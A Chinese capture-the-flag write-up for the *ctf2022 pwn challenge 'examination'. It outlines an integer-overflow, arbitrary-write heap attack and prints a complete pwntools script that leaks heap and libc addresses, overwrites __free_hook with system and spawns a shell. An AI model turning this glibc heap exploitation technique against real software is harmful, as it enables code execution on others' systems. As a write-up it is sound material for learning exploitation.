-
-
[原创]【*ctf2022】examination
-
2022-4-28 19:00 7478
-
写在前面
何谓成长?成长就是当你还未成熟的时候脑海中复现的担当。学pwn已经半年多了,总不能还称自己是新手了吧
从之前栈题都不大会,遇到堆题基本放弃,从见了musl、go、arm就躲到现在终于主动去学习相关的知识,这就是成长。成长不仅仅意味着能力的提升,还意味着心灵的成熟,对学习的态度的变化。
最后,引用最近的脑海中一直复现的鼬神的一句话:
“你并不弱,只是缺乏信念”
题解
思路
通过整型溢出,在note段向上伪造结构体实现任意地址写,修改一个chunk的size,free它放入unsortedbin leak libc,再通过任意地址写修改free_hook为system,然后free('/bin/sh')实现shell的get
有些绕过的细节其实调调就能出
难点
这题让我认识到了自己shit一样的逆向
逆不动的时候,可以放gdb里调调,拿张草稿纸画画或者在旁边注一下自己好理解的形式比如:
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 | from pwn import * from LibcSearcher import * from pwnlib.util.iters import mbruteforce from hashlib import sha256 import base64 context.log_level = 'debug' ##context.terminal = ["tmux", "splitw", "-h"] context.arch = 'amd64' context.os = 'linux' def proof_of_work(sh): sh.recvuntil( " == " ) cipher = sh.recvline().strip().decode( "utf8" ) proof = mbruteforce( lambda x: sha256((x).encode()).hexdigest() = = cipher, string.ascii_letters + string.digits, length = 4 , method = 'fixed' ) sh.sendlineafter( "input your ????>" , proof) ##r = remote("chuj.top", 51904) ##proof_of_work(r) libc = ELF( './libc-2.31.so' ) r = process( './examination' ) def z(): gdb.attach(r) def cho(num): r.sendafter( "choice>> " , str (num)) def t_add(num): cho( 1 ) r.sendlineafter( 'enter the number of questions: ' , str (num)) def t_view(idx,cont,size): ##first_view cho( 3 ) r.sendlineafter( "which one? > " , str (idx)) bool_ = r.recvuntil( 'comment:' ) if bool_ = = "enter your comment:" : r.send(cont) else : r.sendline( str (size)) r.sendafter( "enter your comment:" ,cont) def t_delet(idx): cho( 4 ) r.sendafter( "which student id to choose?" , str (idx)) def t_role(num): cho( 5 ) r.sendlineafter( "role: <0.teacher/1.student>: " , str (num)) def s_changeid(idx): cho( 6 ) r.sendlineafter( "input your id: " , str (idx)) ##pre r.sendlineafter( "role: <0.teacher/1.student>: " , str ( 0 )) t_add( 1 ) #0 t_add( 1 ) #1 t_view( 0 , hex ( 0xdeadbeef ), 0x300 ) t_view( 1 , hex ( 0xdeadbeef ), 0x300 ) t_role( 1 ) cho( 3 ) t_role( 0 ) cho( 2 ) ##leak_heap t_role( 1 ) cho( 2 ) r.recvuntil( "Good Job! Here is your reward! " ) heap = int (r.recvuntil( '\n' ,drop = True ),base = 16 ) - 0x2a0 log.success( 'heap:' + hex (heap)) r.sendlineafter( "add 1 to wherever you want! addr: " , '00' + str (heap + 0x200 )) ##make_fake_struct s_changeid( - 15 ) cho( 4 ) pd = p64(heap + 0x968 ) + p64( 0xdeadbeef ) + p64(heap + 0x338 ) r.sendlineafter( "enter your mode!" ,pd) ##change chunck(0x55555555f330) size 311 to 621 t_role( 0 ) t_view( - 13 ,p64( 0x621 ), 0x300 ) ##free_2_trew_in_unsortedbin t_delet( 0 ) ##change struct 2 leak libc t_role( 1 ) s_changeid( - 15 ) cho( 4 ) pd = p64(heap + 0x968 ) + p64( 0xdeadbeef ) + p64(heap + 0x340 ) r.sendlineafter( "enter your mode!" ,pd) s_changeid( - 13 ) cho( 2 ) r.recvuntil( "here is the review:\n" ) libcbase = u64(r.recvuntil( '\x7f' ).ljust( 8 , '\x00' )) - 0x1ecbe0 log.success( 'libcbase:' + hex (libcbase)) ##set_libc_fuc free_hook = libcbase + libc.sym[ '__free_hook' ] system = libcbase + libc.sym[ 'system' ] log.success( 'free_hook:' + hex (free_hook)) log.success( 'system:' + hex (system)) ##change_free_hook s_changeid( - 15 ) cho( 4 ) pd = p64(heap + 0x968 ) + p64( 0xdeadbeef ) + p64(free_hook) r.sendlineafter( "enter your mode!" ,pd) t_role( 0 ) t_view( - 13 ,p64(system), 0x300 ) ##get_shell t_add( 1 ) t_view( 1 , '/bin/sh\x00' , 0x300 ) t_delet( 1 ) r.interactive() |
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
赞赏
他的文章
看原图